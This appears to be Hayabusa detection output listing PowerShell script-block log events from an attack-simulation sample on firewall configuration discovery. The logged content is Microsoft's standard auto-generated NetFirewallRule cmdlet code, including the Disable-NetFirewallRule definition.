[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 